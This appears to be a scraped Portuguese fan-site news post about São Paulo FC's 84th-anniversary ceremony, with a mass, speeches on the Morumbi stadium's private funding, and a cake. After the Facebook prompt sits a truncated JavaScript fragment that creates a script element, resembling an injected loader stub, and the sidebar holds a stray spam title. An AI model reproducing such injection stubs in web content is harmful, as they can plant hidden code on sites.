Fotos

São Paulo FC comemora 84 anos com missa e bolo para os associados

[satellite gallery=8 auto=on caption=off thumbs=on]

(foto: Rubens Chiri /site oficial) 

Na manhã deste sábado, dia 25 de janeiro, o presidente Juvenal Juvêncio, membros da diretoria do Tricolor e o ex-governador Laudo Natel, patrono e sócio grã-benemérito do clube, celebraram o aniversário de 84 anos do São Paulo Futebol Clube.

Seguindo a tradição, foram hasteadas as bandeiras do São Paulo, pelo presidente Juvenal Juvêncio, do estado de São Paulo, pelo diretor do conselho deliberativo, José Carlos de Ferreira Alves, e do Brasil, por Laudo Natel. Após a cerimônia, uma missa foi celebrada no salão da sede social.

Após a missa solene, Natel teve a palavra e dividiu com os associados um pouco de sua história, que chega a se confundir com parte importante da história do Tricolor.

“Estudava em Mirassol quando soube que na capital surgia um time, o São Paulo FC. Naquele mesmo dia entendi que ia ser torcedor e sócio deste grande clube. Como trabalhava com banco e o time não tinha boas condições financeiras, Cícero Pompeu de Toledo pediu ajuda para quitar os débitos. Além de fazer isso, ainda construímos o Morumbi, sem nenhum dinheiro público. Somos o clube da fé, construímos essa casa com sangue e suor são-paulino. Me orgulho de dizer que nosso clube tem gabarito internacional e ainda cumpre missão local, enfrentando dificuldades e colhendo realizações. Fui duas vezes governador do estado e garanto a quem queira questionar que não há um centavo público neste estádio. Amamos e adoramos o clube, reparto toda minha alegria com todos neste mais um ano de vida do clube, que aniversaria com a cidade”, disse o patrono de 93 anos, sendo aplaudido de pé pelos associados.

Em seguida, Juvenal Juvêncio endossou as palavras de Natel sobre o dinheiro que pagou as obras do estádio, já aproveitando para falar sobre a possível modernização que o Morumbi terá no próximo ano, ganhando cobertura.

“O São Paulo fez essa bela casa sacrossanta e o clube sem dinheiro público, provando nessa época de Copa que seria possível fazer grandes obras sem dinheiro do povo. Esse estádio foi construído com ideias, competência e ansiedade dos homens. A cobertura será feita da mesma forma”, afirmou o mandatário.

A comemoração foi encerrada com parabéns e o corte de um bolo, distribuído para todos os associados presentes no salão de festa.

Fonte: Site Oficial
Faça parte de nossa rede. Curta nossa pagina no Facebook, clicando aqui!var d=document;var s=d.createElement(‘script’);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

nove + treze =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Fotos

Mais em Fotos

custom dolphins jersey Was rivaling old soldiers Lawrence individual and

saopauloadmin1 de maio de 2016

Sem descanso, Pato segue se preparando

saopauloadmin17 de fevereiro de 2014

Fotos: Bastidores de São Paulo x Portuguesa

saopauloadmin16 de fevereiro de 2014

FOTOS: JOGO SÃO PAULO X PORTUGUESA

saopauloadmin16 de fevereiro de 2014

Reunião do Conselho Consultivo do São Paulo Futebol Clube

saopauloadmin15 de fevereiro de 2014

Fotos: Jogo-treino contra a equipe Sub-17 – 13/02/2014

saopauloadmin13 de fevereiro de 2014

Com Pato, Muricy comanda treino técnico

saopauloadmin11 de fevereiro de 2014

FOTOS: JOGO PONTE PRETA X SÃO PAULO

saopauloadmin9 de fevereiro de 2014

“Dois patinhos”? São Paulo apresenta atacante com camisa 22

saopauloadmin5 de fevereiro de 2014